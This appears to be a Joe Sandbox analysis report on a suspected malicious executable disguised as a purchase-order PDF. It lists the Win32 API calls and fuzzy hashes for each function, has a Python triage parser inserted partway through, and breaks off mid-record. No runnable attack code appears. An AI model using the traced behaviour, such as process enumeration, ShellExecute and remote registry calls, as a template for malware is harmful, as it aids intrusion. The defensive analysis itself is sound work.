• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
• Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
• Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
• Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
• Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
• Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
• Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
• Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
APIs
• _memset.LIBCMT ref: 00457C34
• _memset.LIBCMT ref: 00457CE8
• ShellExecuteExW.SHELL32(?), ref: 00457D34
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• CloseHandle.KERNEL32(?), ref: 00457DDD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
• String ID: <$@
• API String ID: 1325244542-1426351568
• Opcode ID: 1419d59865651ecaf8be0f4e6134ca12af692b6050b2e895030b81c494408991
• Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
• Opcode Fuzzy Hash: 1419d59865651ecaf8be0f4e6134ca12af692b6050b2e895030b81c494408991
• Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
APIs
• CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
• Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
• __wsplitpath.LIBCMT ref: 004737E1
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcscat.LIBCMT ref: 004737F6
• __wcsicoll.LIBCMT ref: 00473818
• Process32NextW.KERNEL32(00000000,?), ref: 00473844
• CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 2547909840-0
• Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
• Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
• Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                                                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2354583917-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                                                                            • GetMenu.USER32 ref: 004776AA
                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                                                                                                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0047771A
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Menu$CountItemStringWindow_wcslen
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1823500076-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 896007046-0
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
• GetWindowLongW.USER32(?,000000F0), ref: 00441452
• GetWindowLongW.USER32(?,000000F0), ref: 00441493
• SendMessageW.USER32(00B71C40,000000F1,00000000,00000000), ref: 004414C6
• SendMessageW.USER32(00B71C40,000000F1,00000001,00000000), ref: 004414F1
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
APIs
• _memset.LIBCMT ref: 004484C4
• GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
• IsMenu.USER32(?), ref: 0044857B
• InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
• DrawMenuBar.USER32 ref: 004485E4
Strings
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
APIs
• InterlockedIncrement.KERNEL32 ref: 0047247C
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
• Sleep.KERNEL32(0000000A), ref: 00472499
• InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
Strings
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: 0vH
• API String ID: 327565842-3662162768
APIs
• SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
• GetFocus.USER32 ref: 00448B1C
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3429747543-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00401C62
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                            • String ID: Line:
                                                                                                                                                                                                                                                                                                            • API String ID: 1620655955-1585850449
                                                                                                                                                                                                                                                                                                            • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                                                                                                                                                            • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045D3CC
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                                                                                                            • String ID: %lu$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 3164766367-3924996404
                                                                                                                                                                                                                                                                                                            • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                                                                                                                                                            • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
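The per-function records above (API list, memory-dump source, similarity IDs, fuzzy hashes) are what an analyst reads through to decide which functions to open first in the disassembler. The following Python is an added example and is not part of this Joe Sandbox report or its tooling: it parses records in the layout used on this page into structured data and applies a few triage heuristics. The record text in SAMPLE is constructed from records shown above; the heuristics, including the rule that a CreateThread(CREATE_SUSPENDED)/ResumeThread pair surrounded by CRT internals such as ___set_flsgetvalue and __getptd is the runtime's own _beginthreadex pattern rather than something to chase, are the editor's assumptions. SEM_FAILCRITICALERRORS = 0x1 and CREATE_SUSPENDED = 0x4 are the documented Win32 values.

```python
"""Parse Joe Sandbox per-function records ('APIs' / 'Strings' / 'Memory Dump
Source' / 'Similarity' blocks) and flag the ones worth opening first in IDA.
Added example, not Joe Sandbox code. SAMPLE is constructed from records on
this page; the triage rules are the editor's assumptions, not JB signatures."""
import re
from dataclasses import dataclass, field
from typing import Optional

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# '• Name.MODULE(args), ref: ADDR'  or  '• Name.MODULE ref: ADDR' when no args were recovered
API_RE = re.compile(r"^•\s*(?P<name>[\w$@?]+)\.(?P<module>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^•\s*Part of subcall function (?P<func>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                        # raw tokens; '?' = value not recovered by the sandbox
    ref: str                          # call-site address
    subcall_of: Optional[str] = None  # set for 'Part of subcall function' lines

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # 'String ID' value split on '$'
    meta: dict = field(default_factory=dict)     # Source File, Opcode ID, fuzzy hashes, ...

def parse_api_line(text: str, subcall_of: Optional[str] = None) -> Optional[ApiCall]:
    m = API_RE.match(text)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), subcall_of)

def parse_records(report_text: str) -> list:
    records, section, current = [], None, None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            if section == "APIs":         # every 'APIs' header opens a new function record
                current = FunctionRecord()
                records.append(current)
        elif not line or current is None:
            continue
        elif section == "APIs":
            sub = SUBCALL_RE.match(line)
            call = parse_api_line("• " + sub.group("rest"), sub.group("func")) if sub else parse_api_line(line)
            if call:
                current.apis.append(call)
        elif (kv := KV_RE.match(line)):
            key, val = kv.group("key").strip(), kv.group("val").strip()
            current.meta[key] = val
            if key == "String ID" and val:
                current.strings = val.split("$")
    return records

SEM_FAILCRITICALERRORS = "00000001"  # SetErrorMode flag: no 'drive not ready' dialogs
CREATE_SUSPENDED = "00000004"        # CreateThread dwCreationFlags (5th argument)
CRT_INTERNALS = {"___set_flsgetvalue", "__getptd", "__calloc_crt"}  # editor's assumption: CRT noise markers

def triage(rec: FunctionRecord) -> list:
    """Analyst notes for one record. Editor's heuristics, not sandbox verdicts."""
    notes, direct = [], {c.name for c in rec.apis if c.subcall_of is None}
    if "GetVolumeInformationW" in direct and any(s.startswith("%lu") for s in rec.strings):
        notes.append("GetVolumeInformationW result formatted with %lu: host-fingerprint candidate")
    if any(c.name == "SetErrorMode" and c.args[:1] == [SEM_FAILCRITICALERRORS] for c in rec.apis):
        notes.append("SetErrorMode(SEM_FAILCRITICALERRORS): drives probed without visible errors")
    suspended = any(c.name == "CreateThread" and c.args[4:5] == [CREATE_SUSPENDED] for c in rec.apis)
    if suspended and "ResumeThread" in direct:
        notes.append("CreateThread(CREATE_SUSPENDED)+ResumeThread " + (
            "inside CRT helpers: matches _beginthreadex, runtime noise"
            if direct & CRT_INTERNALS else "outside the CRT: inspect the start address"))
    return notes

SAMPLE = """\
APIs
• SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
• GetFocus.USER32 ref: 00448B1C
Similarity
• String ID:
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D32F
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
• __swprintf.LIBCMT ref: 0045D3CC
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: %lu$HH
APIs
• ___set_flsgetvalue.LIBCMT ref: 00415737
• CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
• ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
"""
```

Run on SAMPLE, the first record (window enable/show calls) gets no notes, the GetVolumeInformationW record gets two (the %lu formatting and the SEM_FAILCRITICALERRORS call), and the CreateThread record is downgraded to CRT noise because ___set_flsgetvalue sits in the same function. One caveat when extending the rules: argument tokens the sandbox could not recover appear as '?', so any rule keyed on an argument value silently misses call sites where that argument is unknown; rules keyed on API names and the String ID list do not have that gap.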
APIs
• ___set_flsgetvalue.LIBCMT ref: 00415737
• __calloc_crt.LIBCMT ref: 00415743
